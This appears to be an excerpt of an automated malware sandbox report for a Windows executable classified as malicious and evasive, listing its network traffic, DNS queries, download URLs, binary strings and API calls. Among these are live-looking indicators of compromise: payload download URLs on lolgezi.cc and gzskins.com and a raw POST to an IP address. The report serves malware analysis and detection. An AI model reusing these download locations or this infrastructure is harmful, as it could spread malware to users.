Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57331 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57334 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57333 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57332 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57335 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_10051530 WSARecvFrom,WSAGetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,14_2_10051530
Source: global trafficHTTP traffic detected: GET /storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQxN3dJdEF5Q0tv&un=D520D8ADC384964E306AF1AA3DEEAF44A0596F6CB5C8600FE560D3DA9892C32B&dom=D930&rate=0&txType=0 HTTP/1.1Accept: */*Accept-Language: en-CHCache-Control: no-cacheConnection: Keep-AliveHost: download6.mcloud.139.comPragma: no-cacheReferer: https://download6.mcloud.139.com/storageWeb/servletUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Source: global trafficHTTP traffic detected: GET /file/350f2ed90l674df0a13399cb294b0863?bkt=en-82d2bca2fdceac3fabfb1ed2452331aa4ea92c5a28680a39063f76c7d20de64ee244b6b41ae7090f&fid=1103614021113-16051585-129100381070572&time=1730907642&sign=FDTAXUbGERQlBHSKfWqi-DCb740ccc5511e5e8fedcff06b081203-r6WwRtBhYnf79bsQAZEomL42rw0%3D&to=75&size=5941360&sta_dx=5941360&sta_cs=317&sta_ft=webm&sta_ct=3&sta_mt=3&fm2=MH%2CYangquan%2CAnywhere%2C%2CNone%2Cany&ctime=1729728590&mtime=1729728590&dt3=24&resv0=-1&resv1=0&resv2=rlim&resv3=5&resv4=5941360&vuk=1103614021113&iv=0&vl=1&htype=&randtype=&tkbind_id=0&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=en-3cf4596bf0ad06de52fd9a80914cd67c97711c5c404e764460b4925d0024dd1473b613b062ffe5bb&expires=8h&rt=pr&r=569376143&mlogid=7212657344168653326&vbdid=-&fin=SLCoreAssets254_2.webm&fn=SLCoreAssets254_2.webm&err_ver=1.0&rtype=1&clienttype=70&dp-logid=7212657344168653326&dp-callid=0.1.1&hps=1&tsl=0&csl=0&fsl=-1&csign=pnawazyXxvhDSfXVs1mpjf37Nwk%3D&so=0&ut=6&uter=4&serv=1&uc=3871693838&ti=39965399e74cce84af8a76d067ba343c3eb28ff7aebe9176&hflag=30&from_type=1&adg=n&reqlabel=16051585_d_831b808e43ac56a7fd3c1706a38d91ab_-1_769817cf1ab77604e3ebedabfe8c530f&fpath=_pcs_.appdata%2Fyoua%2Fweb&by=themis HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Cache-Control: no-cacheHost: bjbgp01.baidupcs.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /SLVersionConfig.json HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /SLServerConfig.json HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/PanAlistPhoto/SLBox241019_2.webm HTTP/1.1Accept: */*Accept-Language: en-CHCache-Control: no-cacheConnection: Keep-AliveHost: skinx.x1.lolgezi.ccPragma: no-cacheReferer: http://skinx.x1.lolgezi.cc/d/PanAlistPhotoUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Source: global trafficHTTP traffic detected: GET /d/PanAlist139Yun/SLBox/%E8%B5%84%E6%BA%90%E4%BF%AE%E5%A4%8D%E5%8C%85_241019_1.exe HTTP/1.1Accept: */*Accept-Language: en-CHCache-Control: no-cacheConnection: Keep-AliveHost: skinx.x1.lolgezi.ccPragma: no-cacheReferer: http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBoxUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Source: global trafficHTTP traffic detected: GET /SLAppAssets101.to HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/PanAlistPhoto/SLCoreAssets254_2.webm HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: skinx.x1.lolgezi.ccCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: os.ljq520.top
Source: global trafficDNS traffic detected: DNS query: sl.gzskins.com
Source: global trafficDNS traffic detected: DNS query: hub5pn.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: hub5pnc.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: hub5u.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: hub5c.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: pmap.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: skinx.x1.lolgezi.cc
Source: global trafficDNS traffic detected: DNS query: hub5idx.shub.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: hubstat.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: relay.phub.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: hub5pr.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: imhub5pr.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: score.phub.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: bjbgp01.baidupcs.com
Source: global trafficDNS traffic detected: DNS query: download6.mcloud.139.com
Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 140.206.225.136:80Content-type: application/octet-streamContent-Length: 204Connection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: TengineContent-Type: text/htmlContent-Length: 238Connection: keep-aliveDate: Wed, 06 Nov 2024 15:40:22 GMTX-Tengine-Error: You are forbidden to list bucketsVia: cache28.l2cn2656[0,0,403-1280,M], cache40.l2cn2656[1,0], kunlun7.cn7174[13,13,403-1280,M], kunlun3.cn7174[20,0]Ali-Swift-Global-Savetime: 1730907622X-Cache: MISS TCP_MISS dirn:-2:-2X-Swift-Error: orig response 4XX errorX-Swift-SaveTime: Wed, 06 Nov 2024 15:40:22 GMTX-Swift-CacheTime: 1Timing-Allow-Origin: *EagleId: b4a3921717309076222595605e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: TengineContent-Type: text/htmlContent-Length: 238Connection: keep-aliveDate: Wed, 06 Nov 2024 15:40:22 GMTX-Tengine-Error: You are forbidden to list bucketsVia: cache28.l2cn2656[0,0,403-1280,M], cache40.l2cn2656[1,0], kunlun7.cn7174[0,0,403-0,H], kunlun3.cn7174[4,0]Age: 0Ali-Swift-Global-Savetime: 1730907622X-Cache: HIT TCP_MEM_HIT dirn:-2:-2X-Swift-SaveTime: Wed, 06 Nov 2024 15:40:22 GMTX-Swift-CacheTime: 1Timing-Allow-Origin: *EagleId: b4a3921717309076229088651e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: TengineContent-Type: text/htmlContent-Length: 238Connection: keep-aliveDate: Wed, 06 Nov 2024 15:40:23 GMTX-Tengine-Error: You are forbidden to list bucketsVia: cache27.l2cn3130[43,43,403-1280,M], cache24.l2cn3130[44,0], kunlun7.cn7174[54,54,403-1280,M], kunlun3.cn7174[57,0]Ali-Swift-Global-Savetime: 1730907623X-Cache: MISS TCP_MISS dirn:-2:-2X-Swift-Error: orig response 4XX errorX-Swift-SaveTime: Wed, 06 Nov 2024 15:40:23 GMTX-Swift-CacheTime: 1Timing-Allow-Origin: *EagleId: b4a3921717309076235413592e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.9.3.2Date: Wed, 06 Nov 2024 15:40:28 GMTContent-Type: text/htmlContent-Length: 537Connection: keep-aliveETag: "5e673b37-219" Data Ascii: <!DOCTYPE html><html><head><title>Error</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; 
}</style></head><body><h1>An error occurred.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>If you are the system administrator of this resource then you should checkthe <a href="http://nginx.org/r/error_log">error log</a> for details.</p><p><em>Faithfully yours, nginx.</em></p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: TengineContent-Type: text/htmlContent-Length: 238Connection: keep-aliveDate: Wed, 06 Nov 2024 15:40:30 GMTX-Tengine-Error: You are forbidden to list bucketsVia: cache27.l2cn3130[1,0,403-1280,M], cache3.l2cn3130[1,0], kunlun7.cn7174[17,17,403-1280,M], kunlun3.cn7174[19,0]Ali-Swift-Global-Savetime: 1730907630X-Cache: MISS TCP_MISS dirn:-2:-2X-Swift-Error: orig response 4XX errorX-Swift-SaveTime: Wed, 06 Nov 2024 15:40:30 GMTX-Swift-CacheTime: 1Timing-Allow-Origin: *EagleId: b4a3921717309076308173929e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.9.3.2Date: Wed, 06 Nov 2024 15:40:35 GMTContent-Type: text/htmlContent-Length: 537Connection: keep-aliveETag: "5e673b37-219" Data Ascii: <!DOCTYPE html><html><head><title>Error</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; 
}</style></head><body><h1>An error occurred.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>If you are the system administrator of this resource then you should checkthe <a href="http://nginx.org/r/error_log">error log</a> for details.</p><p><em>Faithfully yours, nginx.</em></p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: TengineContent-Type: text/htmlContent-Length: 238Connection: keep-aliveDate: Wed, 06 Nov 2024 15:40:38 GMTX-Tengine-Error: You are forbidden to list bucketsVia: cache27.l2cn3130[62,62,403-1280,M], cache61.l2cn3130[67,0], kunlun7.cn7174[82,81,403-1280,M], kunlun3.cn7174[84,0]Ali-Swift-Global-Savetime: 1730907638X-Cache: MISS TCP_MISS dirn:-2:-2X-Swift-Error: orig response 4XX errorX-Swift-SaveTime: Wed, 06 Nov 2024 15:40:38 GMTX-Swift-CacheTime: 1Timing-Allow-Origin: *EagleId: b4a3921717309076386235405e
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, download_engine.dll.7.dr, XLBugHandler.dll.7.dr, MiniThunderPlatform.exe.7.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: MiniThunderPlatform.exe, 0000000E.00000003.1545516600.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csc3-2010-aia.verisig
Source: MiniThunderPlatform.exe, 0000000E.00000002.1614649879.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://logo.verisign.c
Source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000003.1722484573.000000000C66C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722583922.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722683050.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722646058.000000000C674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nginx.org/r/error_log
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, download_engine.dll.7.dr, XLBugHandler.dll.7.dr, MiniThunderPlatform.exe.7.drString found in binary or memory: http://ocsp.thawte.com0
Source: MiniThunderPlatform.exe, 0000000E.00000002.1614649879.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.ver
Source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000003.1722484573.000000000C66C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722583922.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1723141682.000000000C670000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722815289.000000000C66A000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722839677.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1724450109.000000000C670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBox
Source: MiniThunderPlatform.exe, 0000000F.00000003.1722484573.000000000C66C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722583922.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722683050.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722646058.000000000C674000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1724293363.0000000000BF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBox/
Source: MiniThunderPlatform.exe, 0000000F.00000003.1722646058.000000000C674000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1723825853.0000000000862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBox/%E8%B5%84%E6%BA%90%E4%BF%AE%E5%A4%8D%E5%8C%85_2410
Source: MiniThunderPlatform.exe, 0000000F.00000003.1722484573.000000000C66C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722583922.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1723141682.000000000C670000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722815289.000000000C66A000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722839677.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1724450109.000000000C670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBoxp
Source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto
Source: MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000002.1614649879.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000002.1616442401.0000000000C85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webm
Source: MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webm11J
Source: MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webm12
Source: MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webm?
Source: MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webmM
Source: MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webma
Source: MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webms
Source: MiniThunderPlatform.exe, 0000000E.00000002.1614649879.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webmtiH
Source: MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhotocept:
Source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1723428878.0000000000448000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: http://store.paycenter.uc.cn
Source: MiniThunderPlatform.exe, 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1723428878.0000000000448000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: http://store.paycenter.uc.cnmail-attachment.googleusercontent.com
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, download_engine.dll.7.dr, XLBugHandler.dll.7.dr, MiniThunderPlatform.exe.7.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, download_engine.dll.7.dr, XLBugHandler.dll.7.dr, MiniThunderPlatform.exe.7.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, download_engine.dll.7.dr, XLBugHandler.dll.7.dr, MiniThunderPlatform.exe.7.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
Source: MiniThunderPlatform.exe, 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: minizip.dll.7.drString found in binary or memory: http://www.winimage.com/zLibDll
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, minizip.dll.7.drString found in binary or memory: http://www.winimage.com/zLibDll-
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, minizip.dll.7.drString found in binary or memory: http://www.winimage.com/zLibDll1.2.3
Source: MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.xunlei.com/
Source: MiniThunderPlatform.exe, 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.xunlei.com/GET
Source: MiniThunderPlatform.exe, 0000000E.00000002.1618143876.000000000C90C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000002.1617920624.000000000C904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bjbgp01.baidupcs.com/file/0a382c0d6mc9d86e83dea8b6b711ec95?bkt=en-2e2b5030dd6ff03724ec263689
Source: MiniThunderPlatform.exe, 0000000F.00000003.1675363991.000000000C6E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download6.mcloud.139.com
Source: MiniThunderPlatform.exe, 0000000F.00000002.1724450109.000000000C670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download6.mcloud.139.com/storageWeb/servlet
Source: MiniThunderPlatform.exe, 0000000F.00000003.1722646058.000000000C674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download6.mcloud.139.com/storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQxN3d
Source: MiniThunderPlatform.exe, 0000000F.00000003.1675363991.000000000C6E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download6.mcloud.139.com3TQ
Source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000003.1722484573.000000000C66C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722583922.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1723141682.000000000C670000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722815289.000000000C66A000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722839677.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1724450109.000000000C670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download6.mcloud.139.com:443/storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQ
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1416143729.00000000083CE000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415949041.00000000081F1000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415571391.00000000081FC000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415739688.0000000008368000.00000004.00000020.00020000.00000000.sdmp, ExuiKrnln_Win32.lib.5.dr, ExuiKrnln_Win64.lib.5.drString found in binary or memory: https://iexui.com/downexui
Source: unknownHTTPS traffic detected: 113.200.1.7:443 -> 192.168.2.10:57356 version: TLS 1.2

System Summary

Source: AntiCheat.dll.7.drStatic PE information: section name: .(
Source: AntiCheat.dll.7.drStatic PE information: section name: .!
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C656130 NtSetInformationThread,7_3_6C656130
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\download\XLBugHandler.dll 1845DF41DA539BCA264F59365BF7453B686B9098CC94CD0E2B9A20C74A561096
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\download\atl71.dll A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: String function: 100261B0 appears 239 times
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: String function: 004174A6 appears 106 times
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: String function: 10013220 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: String function: 10025930 appears 370 times
Source: api-ms-win-crt-heap-l1-1-0.dll.7.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.7.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.7.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.7.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.7.drStatic PE information: No import functions for PE file found
Source: VZ7xFmeuPX.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: xldl.dll.7.drStatic PE information: Section: UPX1 ZLIB complexity 0.9888613861386139
Source: msvcr71.dll.7.drStatic PE information: Section: UPX1 ZLIB complexity 0.9887627495659722
Source: classification engineClassification label: mal100.evad.winEXE@10/37@45/15
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_10049AB0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,GetModuleHandleA,GetProcAddress,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,GetVolumeInformationA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CreateFileA,SetFilePointer,SetEndOfFile,CloseHandle,GetLastError,SetEndOfFile,CloseHandle,CloseHandle,Sleep,14_2_10049AB0
